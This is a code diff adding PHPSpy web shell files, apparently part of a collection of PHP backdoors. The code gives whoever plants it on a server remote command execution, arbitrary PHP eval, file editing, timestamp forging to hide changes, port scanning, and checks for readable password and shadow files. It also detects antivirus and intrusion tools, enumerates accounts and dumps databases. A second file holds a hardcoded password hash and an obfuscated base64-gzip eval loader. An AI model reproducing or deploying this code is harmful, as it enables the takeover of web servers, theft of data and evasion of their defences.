+		foreach(explode(',', $p3) as $port) {
+			$fp = @fsockopen($p2, $port, $errno, $errstr, 1); 
+			if (!$fp) {
+				p('<li>'.$p2.':'.$port.' ------------------------ <span class="b">Close</span></li>');
+		   } else {
+				p('<li>'.$p2.':'.$port.' ------------------------ <span class="red b">Open</span></li>');
+				@fclose($fp);
+		   } 
+		}
+		p('</ul>');
+	}
+}
+
+elseif ($act == 'eval') {
+	$phpcode = trim($p1);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code', 'onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
+	maketext(array('title'=>'PHP Code','name'=>'p1', 'value'=>$phpcode));
+	p('<p><a href="http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($act == 'editfile') {
+
+	// ±à¼­Îļþ
+	if ($p1 == 'edit' && $p2 && $p3) {
+		$fp = @fopen($p2,'w');
+		m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+	$contents = '';
+	if(file_exists($p2)) {
+		$fp=@fopen($p2,'r');
+		$contents=@fread($fp, filesize($p2));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File', 'onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;'));
+	makeinput(array('title'=>'Filename','name'=>'p2','value'=>$p2,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'p3','value'=>$contents));
+	formfooter();
+	goback();
+
+}//end editfile
+
+elseif ($act == 'newtime') {
+	$filemtime = @filemtime($p1);
+
+	formhead(array('title'=>'Clone folder/file was last modified time', 'onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;'));
+	makeinput(array('title'=>'Alter folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference folder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
+	formfooter();
+
+	formhead(array('title'=>'Set last modified', 'onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;'));
+	makeinput(array('title'=>'Current folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Modify time','name'=>'p3','value'=>date("Y-m-d H:i:s", $filemtime),'size'=>120,'newline'=>1));
+	formfooter();
+
+	goback();
+}//end newtime
+
+elseif ($act == 'shell') {
+	formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
+	p('<p>');
+	makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
+	makeinput(array('class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($p1) {
+		p('<pre>'.execute($p1).'</pre>');
+	}
+}//end shell
+
+elseif ($act == 'phpenv') {
+	$d=array();
+	if(function_exists('mysql_get_client_info'))
+		$d[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$d[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$d[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$d[] = "Oracle";
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',($dis_func ? $dis_func : 'No')),
+		24 => array('Supported databases',implode(', ', $d)),
+		25 => array('cURL support',function_exists('curl_version') ? 'Yes' : 'No'),
+		26 => array('Open base dir',getcfg('open_basedir')),
+		27 => array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
+		28 => array('Safe mode include dir',getcfg('safe_mode_include_dir')),
+	);
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=25;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+elseif ($act == 'secinfo') {
+	
+	if( !IS_WIN ) {
+		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
+		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
+		secparam('OS version', @file_get_contents('/proc/version'));
+		secparam('Distr name', @file_get_contents('/etc/issue.net'));
+		$safe_mode = @ini_get('safe_mode');
+		if(!$GLOBALS['safe_mode']) {
+			$temp=array();
+			foreach ($userful as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Userful', implode(', ',$temp));
+			$temp=array();
+			foreach ($danger as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Danger', implode(', ',$temp));
+			$temp=array();
+			foreach ($downloaders as $item) 
+				if(which($item)){$temp[]=$item;}
+			secparam('Downloaders', implode(', ',$temp));
+			secparam('Hosts', @file_get_contents('/etc/hosts'));
+			secparam('HDD space', execute('df -h'));
+			secparam('Mount options', @file_get_contents('/etc/fstab'));
+		}
+	} else {
+		secparam('OS Version',execute('ver'));
+		secparam('Account Settings',execute('net accounts'));
+		secparam('User Accounts',execute('net user'));
+		secparam('IP Configurate',execute('ipconfig -all'));
+	}
+}//end
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;">
+	<?php
+	debuginfo();
+	ob_end_flush();
+	if (isset($DB)) {
+		echo '. '.$DB->querycount.' queries';
+	}
+	?>
+	</span>
+	Powered by <a title="Build 20130112" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2013 final</a>. Copyright (C) 2004-2013 <a href="http://www.4ngel.net" target="_blank">[S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function secparam($n, $v) {
+	$v = trim($v);
+	if($v) {
+		p('<h2>'.$n.' &raquo;</h2>');
+		p('<div class="infolist">');
+		if(strpos($v, "\n") === false)
+			p($v.'<br />');
+		else
+			p('<pre>'.$v.'</pre>');
+		p('</div>');
+	}
+}
+function m($msg) {
+	echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function s_array($array) {
+	return is_array($array) ? array_map('s_array', $array) : stripslashes($array);
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
+	$key = ($prefix ? $cookiepre : '').$key;
+	$life = $life ? $life : $cookielife;
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
+}
+function loginpage() {
+	formhead();
+	makehide('act','login');
+	makeinput(array('name'=>'password','type'=>'password','size'=>'20'));
+	makeinput(array('type'=>'submit','value'=>'Login'));
+	formfoot();
+	exit;
+}
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+function dirsize($cwd) { 
+	$dh = @opendir($cwd);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $cwd.'/'.$file;
+			$size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($file){
+	return substr(base_convert(@fileperms($file),10,8),-4);
+}
+
+function PermsColor($f) { 
+	if (!is_readable($f)) {
+		return '<span class="red">'.getPerms($f).'</span>';
+	} elseif (!is_writable($f)) {
+		return '<span class="black">'.getPerms($f).'</span>';
+	} else {
+		return '<span class="green">'.getPerms($f).'</span>';
+	}
+}
+function getPerms($file) {
+	$mode = @fileperms($file);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($file)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($file));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+function copy_paste($c,$f,$d){
+	if(is_dir($c.$f)){
+		mkdir($d.$f);
+		$dirs = scandir($c.$f);
+		if ($dirs) {
+			$dirs = array_diff($dirs, array('..', '.'));
+			foreach ($dirs as $file) {
+				copy_paste($c.$f.'/',$file, $d.$f.'/');
+			}
+		}
+	} elseif(is_file($c.$f)) {
+		copy($c.$f, $d.$f);
+	}
+}
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$dirs = @scandir($deldir);
+	if ($dirs) {
+		$dirs = array_diff($dirs, array('..', '.'));
+		foreach ($dirs as $file) {	
+			if((is_dir($deldir.'/'.$file))) {
+				@chmod($deldir.'/'.$file,0777);
+				deltree($deldir.'/'.$file); 
+			} else {
+				@chmod($deldir.'/'.$file,0777);
+				@unlink($deldir.'/'.$file);
+			}
+		}
+		@chmod($deldir,0777);
+		return @rmdir($deldir) ? 1 : 0;
+	} else {
+		return 0;
+	}
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+function cmp($a, $b) {
+	global $sort;
+	if(is_numeric($a[$sort[0]])) {
+		return (($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1);
+	} else {
+		return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1);
+	}
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($cwd) {
+	$pathdb = explode('/', $cwd);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// »ñµÃÎļþÀ©Õ¹Ãû
+function getext($file) {
+	$info = pathinfo($file);
+	return $info['extension'];
+}
+function GetWDirList($path){
+	global $dirdata,$j,$web_cwd;
+	!$j && $j=1;
+	$dirs = @scandir($path);
+	if ($dirs) {
+		$dirs = array_diff($dirs, array('..','.'));
+		foreach ($dirs as $file) {
+			$f=str_replace('//','/',$path.'/'.$file);
+			if(is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['chmod']=getChmod($f);
+					$dirdata[$j]['perm']=PermsColor($f);
+					$dirdata[$j]['owner']=getUser($f);
+					$dirdata[$j]['link']=$f;
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+function sizecount($size) {
+	$unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB');
+	for ($i = 0; $size >= 1024 && $i < 5; $i++) {
+		$size /= 1024;
+	}
+	return round($size, 2).' '.$unit[$i];
+}
+function p($str){
+	echo $str."\n";
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['type'] = isset($arg['type']) ? $arg['type'] : 'text';
+	$arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
+	$arg['class'] = isset($arg['class']) ? $arg['class'] : 'input';
+	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
+	$arg['value'] = isset($arg['value']) ? $arg['value'] : '';
+	if (isset($arg['newline'])) p('<p>');
+	p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] />");
+	if (isset($arg['newline'])) p('</p>');
+}
+
+function makeselect($arg = array()){
+	$onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
+	$arg['title'] = isset($arg['title']) ? $arg['title'] : '';
+	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+}
+function formhead($arg = array()) {
+	!isset($arg['method']) && $arg['method'] = 'post';
+	!isset($arg['name']) && $arg['name'] = 'form1';
+	$arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
+	$arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"".SELF."\" method=\"$arg[method]\" $arg[onsubmit] $arg[extra]>");
+	if (isset($arg['title'])) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	$arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
+	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"100\" rows=\"25\">$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $cwd, $charset;
+	p('<form action="'.SELF.'" method="post"><input type="hidden" name="act" value="file" /><input type="hidden" name="cwd" value="'.$cwd.'" /><input type="hidden" name="charset" value="'.$charset.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+function encode_pass($pass) {
+	$k = 'angel';
+	$pass = md5($k.$pass);
+	$pass = md5($pass.$k);
+	$pass = md5($k.$pass.$k);
+	return $pass;
+}
+
+function pr($a) {
+	p('<div style="text-align: left;border:1px solid #ddd;"><pre>'.print_r($a).'</pre></div>');
+}
+
+class DB_MySQL  {
+
+	var $querycount = 0;
+	var $link;
+	var $charsetdb = array();
+	var $charset = '';
+
+	function connect($dbhost, $dbuser, $dbpass, $dbname='') {
+		@ini_set('mysql.connect_timeout', 5);
+		if(!$this->link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
+			$this->halt('Can not connect to MySQL server');
+		}
+		if($this->version() > '4.1') {
+			$this->setcharset($this->charset);
+		}
+		$dbname && mysql_select_db($dbname, $this->link);
+	}
+	function setcharset($charset) {
+		if ($charset && $this->charsetdb[$charset]) {
+			if(function_exists('mysql_set_charset')) {
+				mysql_set_charset($this->charsetdb[$charset], $this->link);
+			} else {
+				$this->query("SET character_set_connection='".$this->charsetdb[$charset]."', character_set_results='".$this->charsetdb[$charset]."', character_set_client=binary");
+			}
+		}
+	}
+	function select_db($dbname) {
+		return mysql_select_db($dbname, $this->link);
+	}
+	function geterrdesc() {
+		return (($this->link) ? mysql_error($this->link) : mysql_error());
+	}
+	function geterrno() {
+		return intval(($this->link) ? mysql_errno($this->link) : mysql_errno());
+	}
+	function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
+		return mysql_fetch_array($query, $result_type);
+	}
+	function query($sql) {
+		//echo '<p style="color:#f00;">'.$sql.'</p>';
+		if(!($query = mysql_query($sql, $this->link))) {
+			$this->halt('MySQL Query Error', $sql);
+		}
+		$this->querycount++;
+		return $query;
+	}
+	function query_res($sql) { 
+		$res = '';
+		if(!$res = mysql_query($sql, $this->link)) { 
+			$res = 0;
+		} else if(is_resource($res)) {
+			$res = 1; 
+		} else {
+			$res = 2;
+		}
+		$this->querycount++;
+		return $res;
+	}
+	function num_rows($query) {
+		$query = mysql_num_rows($query);
+		return $query;
+	}
+	function num_fields($query) {
+		$query = mysql_num_fields($query);
+		return $query;
+	}
+	function affected_rows() {
+		return mysql_affected_rows($this->link);
+	}
+	function result($query, $row) {
+		$query = mysql_result($query, $row);
+		return $query;
+	}	
+	function free_result($query) {
+		$query = mysql_free_result($query);
+		return $query;
+	}
+	function version() {
+		return mysql_get_server_info($this->link);
+	}
+	function close() {
+		return mysql_close($this->link);
+	}
+	function halt($msg =''){
+		echo "<h2>".htmlspecialchars($msg)."</h2>\n";
+		echo "<p class=\"b\">Mysql error description: ".htmlspecialchars($this->geterrdesc())."</p>\n";
+		echo "<p class=\"b\">Mysql error number: ".$this->geterrno()."</p>\n";
+		exit;
+	}
+	function get_fields_meta($result) {
+		$fields = array();
+		$num_fields = $this->num_fields($result);
+		for ($i = 0; $i < $num_fields; $i++) {
+			$field = mysql_fetch_field($result, $i);
+			$fields[] = $field;
+		}
+		return $fields;
+	}
+	function sqlAddSlashes($s = ''){
+		$s = str_replace('\\', '\\\\', $s);
+		$s = str_replace('\'', '\'\'', $s);
+		return $s;
+	}
+	// ±¸·ÝÊý¾Ý¿â
+	function sqldump($table, $fp=0) {
+		$crlf = (IS_WIN ? "\r\n" : "\n");
+		$search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required
+		$replace = array('\0', '\n', '\r', '\Z');
+
+		if (isset($this->charset) && isset($this->charsetdb[$this->charset])) {
+			$set_names = $this->charsetdb[$this->charset];
+		} else {
+			$set_names = $this->charsetdb['utf-8'];
+		}
+		$tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
+		$tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
+			   . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
+			   . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
+			   . '/*!40101 SET NAMES ' . $set_names . ' */;'.$crlf.$crlf;
+
+		$tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf;
+		$res = $this->query("SHOW CREATE TABLE $table");
+		$create = $this->fetch($res, MYSQL_NUM);
+		$tabledump .= $create[1].';'.$crlf.$crlf;
+		if (strpos($tabledump, "(\r\n ")) {
+			$tabledump = str_replace("\r\n", $crlf, $tabledump);
+		} elseif (strpos($tabledump, "(\n ")) {
+			$tabledump = str_replace("\n", $crlf, $tabledump);
+		} elseif (strpos($tabledump, "(\r ")) {
+			$tabledump = str_replace("\r", $crlf, $tabledump);
+		}
+		unset($create);
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+		$tabledump = '';
+		$rows = $this->query("SELECT * FROM $table");
+		$fields_cnt = $this->num_fields($rows);
+		$fields_meta = $this->get_fields_meta($rows);
+
+		while ($row = $this->fetch($rows, MYSQL_NUM)) {
+			for ($j = 0; $j < $fields_cnt; $j++) {
+				if (!isset($row[$j]) || is_null($row[$j])) {
+					$values[] = 'NULL';
+				} elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type != 'timestamp' && !$fields_meta[$j]->blob) {
+					$values[] = $row[$j];
+				} elseif ($fields_meta[$j]->blob) {
+					if (empty($row[$j]) && $row[$j] != '0') {
+						$values[] = '\'\'';
+					} else {
+						$values[] = '0x'.bin2hex($row[$j]);
+					}
+				} else {
+					$values[] = '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';
+				}
+			}
+			$tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
+			unset($values);
+			if ($fp) {
+				fwrite($fp,$tabledump);
+			} else {
+				echo $tabledump;
+			}
+		}
+		$this->free_result($rows);
+	}
+}
+?>
\ No newline at end of file
diff --git a/php/phpspy/phpspy2010.php b/php/phpspy/phpspy2010.php
new file mode 100644
index 0000000..e729288
--- /dev/null
+++ b/php/phpspy/phpspy2010.php
@@ -0,0 +1,21 @@
+<?php
+
+$admin = array();
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = true;
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = 'f4f068e71e0d87bf0ad51e6214ab84e9'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie ÓÐЧÆÚ
+$admin['cookielife'] = 86400;
+
+eval(gzinflate(base64_decode('7b39d1zXcSD4M3yO/4fHVtuvm2z0Bwh+AWyQIACSoEAAAkBSFIF0+uN14xHd/Vr9XgOEaP4xSnbPeCfZE8uWZDuSLH/IY1uOLMWWpdk9yW42m2SOZ8Y/RGfGmZ3EOVtV9/t9dDdIUFYSKTHR737UrVu3bt26devWdfp9r1/pOz2vH7jdVuZcdvaLX7jsO0GlU2259cqLAy9w/Ep/0A3cjpMpYrZXq/hBtR9k8CPdwQyrbDkPem2v4WRsy85ZHbfe96hGlgpReV6Q1bhX2rFOid/FHSjUcJpuF+pvzlc21ta2AIofEGrtah2St7chxS7APw23360C6Erl6vLKUqWSzeYhPauBWN6s3FlehaKLyxtLC1trG3crm0vr8xvz8NMqly0EFiq/sHYTytfbVd+vOA9cP/AzNqZlrUtWyZqxilaowrX1BajQClOq1avzPjdcv9IcdOvQZSxVb7Yq+9V+xob0aq3tUF7gel0/jMr69fXl1atrAD1zwuk7LTeT6u323G7TS+Uk1KyJGA0Z0rLSdjtuwAbqi19oen2nWt/NVPv96mHGrlxbArralfW1zS3oWdW30kDgFweOH2Sth1/8woQon5bprNCec2iV5+DHfrU9cFjZCbdpZSjrYfGRdQKoWrF5DmUxGomUCV4XqOFXGDoC2iwVeET/pnlboinKwyz43yPsUaHwjT/74JOf/vlP/+Htn3zw6s/eefOfX3vnu3/1wXtf/MKJ9EHfDZC0jZr15S9b+icgByTM1VturtfOVf1ezu3Wc/f93G7QaeM/8LtnE8nS9d1qH6hJtTjdgGbVfsevu+55/Ik/4G/NbZ2hP91q/xB+1HulqTNF8aMkfpwVP87Rj/O8yPkzU+zvWVbgwmn8bjh1bMIZ1O/3Oj77tdeHv63a1OnSFP3Yw38dzw8aWLTVdxxM2XVqfecAf/QwGahYq/tYYc9zz/f53wH8bVdhppfEjynx44z4gWh2qvW6w/72vU61Cz/9+y7i4x84WCBw/bNT2JEBa2TAcgdB8zyxM/EGpyTNOJZDzLDrVBtOP5Oqe93A6QaTW4c9Z8YKnAdBAYdj1uL1ylBn8nwKwT2ynLbvRIDSCBwRKNYZBhPpe0SQUGUYRE7wIwJ1fW/y/PkzFyanhsFm7HFE0FBpcq8/Aizx32MAvt9jgGku+U67SZN5c2nj9tLGPRtkG/xeuWrvgPiKTZ7RkjcXNpbXtyqr8zeXbFwi0ijhYC3p9AAoW15ozhZOluP+s37y62/+5Z//6qP/xYrNPlngfFolOYwdT7W9ljcIUqzfft3z9lwQypDqdnuwNOASBP+bPH92uli0Tlqnz54h8dXL2Bc7TlC1doOgNwmS090vp/pOs+/4uymL062cKs3e2lgp23miS95OzdmydhVWu8O2U041ofBMaar3wLrt9BvVbjVl7QKkckqrtjmA6en7FwtVDgFWrIAR3W1Cfxodt3vPru869T17h/WFOtrwYI1nPIk9snVBzitRL3ewTKdxJpPGzwOv38gKOR5Lk1BRJtCfjCYTx0CVCUEXuYTwNWthbe3Z5aV7Wh92jDUtJh8XOJNGgiK8UIsxI2+KphUrEMpnC1kSxyK3vvX/vPs/kjkWZoHTh8WohYsaW7IKBevrv3r7Va43RJja5tqDrThBa